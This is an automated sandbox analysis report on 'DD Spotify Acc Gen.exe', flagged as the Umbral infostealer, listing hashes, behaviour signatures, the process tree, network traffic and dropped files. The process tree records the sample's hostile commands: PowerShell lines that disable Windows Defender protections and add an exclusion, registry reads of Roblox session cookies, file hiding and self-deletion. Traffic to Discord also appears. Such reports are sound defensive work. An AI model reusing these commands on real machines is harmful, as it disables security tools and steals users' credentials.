Analysis

  • max time kernel
    18s
  • max time network
    19s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    25-07-2024 02:26

General

  • Target

    DD Spotify Acc Gen.exe

  • Size

    296KB

  • MD5

    c4cf132278a366635533a2734901aa95

  • SHA1

    06ea6b94f8accb59c3115c67208a1116a12a7f1e

  • SHA256

    382f9d13e5a5945980c767ec1d98732d971a4e07bdb9ed1950d6c455edbb203a

  • SHA512

    d6f4343892a266db8b62892d0c8eef5e63492f49e237d704cf2c5237fe5249f948dbbc8471ae2db00a862af9d7658c6286a72a0f3134786dae82d5fad72eb120

  • SSDEEP

    6144:dloZM+rIkd8g+EtXHkv/iD4PaIWVjgULYyD1Ac5eIb8e1mWiQ:/oZVL+EP8PaIWVjgULYyD1Ac5n0

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs a command via powershell.exe.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe
    "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3332
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2920
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
      2⤵
      • Views/modifies file attributes
      PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:444
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:5092
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:1800
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2752
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:248
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2880

Network

      • flag-us
        DNS
        gstatic.com
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        216.58.201.99
      • flag-us
        DNS
        ip-api.com
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-api.com
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        DD Spotify Acc Gen.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Thu, 25 Jul 2024 02:29:50 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        99.201.58.216.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.201.58.216.in-addr.arpa
        IN PTR
        Response
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f31.1e100.net
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f99.1e100.net
        99.201.58.216.in-addr.arpa
        IN PTR
        lhr48s48-in-f3.1e100.net
      • flag-us
        DNS
        discord.com
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.137.232
      • flag-us
        DNS
        233.128.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        233.128.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        DD Spotify Acc Gen.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Thu, 25 Jul 2024 02:29:54 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • 216.58.201.99:443
        gstatic.com
        tls
        DD Spotify Acc Gen.exe
        803 B
        5.3kB
        8
        8
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        DD Spotify Acc Gen.exe
        362 B
        482 B
        6
        3

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        DD Spotify Acc Gen.exe
        377 B
        550 B
        7
        5

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.128.233:443
        discord.com
        tls
        DD Spotify Acc Gen.exe
        569.7kB
        21.1kB
        425
        274
      • 8.8.8.8:53
        gstatic.com
        dns
        DD Spotify Acc Gen.exe
        321 B
        330 B
        5
        4

        DNS Request

        gstatic.com

        DNS Response

        216.58.201.99

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        99.201.58.216.in-addr.arpa
        dns
        203 B
        442 B
        3
        3

        DNS Request

        99.201.58.216.in-addr.arpa

        DNS Request

        discord.com

        DNS Response

        162.159.128.233
        162.159.136.232
        162.159.138.232
        162.159.135.232
        162.159.137.232

        DNS Request

        233.128.159.162.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        45741c307af2576c6437c5fdb24ef9ce

        SHA1

        a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

        SHA256

        7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

        SHA512

        39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        0ac871344dc49ae49f13f0f88acb4868

        SHA1

        5a073862375c7e79255bb0eab32c635b57a77f98

        SHA256

        688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

        SHA512

        ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        c321dfee531730b7e0b81470b947da3f

        SHA1

        0488401f4fc03bcdab19eeff194ff12f4439e1cb

        SHA256

        6d7da148fe930cf085b5369427eb24e66844d7f00fcc197f056e0763c7a76117

        SHA512

        eee78a9529b1d89631ac8dbaef716eba95166d8c465a2c075bf89d28fab4c25a48c4d29d7f19ab0249b245bf45fac63214b092aaef9b3a09b4f8e6cfa85a076a

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ntf3muj5.1pc.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3332-67-0x000001757A960000-0x000001757A96A000-memory.dmp

        Filesize

        40KB

      • memory/3332-33-0x000001757B4C0000-0x000001757B4DE000-memory.dmp

        Filesize

        120KB

      • memory/3332-85-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3332-68-0x000001757B4E0000-0x000001757B4F2000-memory.dmp

        Filesize

        72KB

      • memory/3332-2-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3332-31-0x000001757B310000-0x000001757B386000-memory.dmp

        Filesize

        472KB

      • memory/3332-32-0x000001757A980000-0x000001757A9D0000-memory.dmp

        Filesize

        320KB

      • memory/3332-1-0x00007FFE4C793000-0x00007FFE4C795000-memory.dmp

        Filesize

        8KB

      • memory/3332-0-0x0000017578C40000-0x0000017578C90000-memory.dmp

        Filesize

        320KB

      • memory/3600-14-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-13-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-11-0x000002F5D38C0000-0x000002F5D38E2000-memory.dmp

        Filesize

        136KB

      • memory/3600-12-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-17-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB
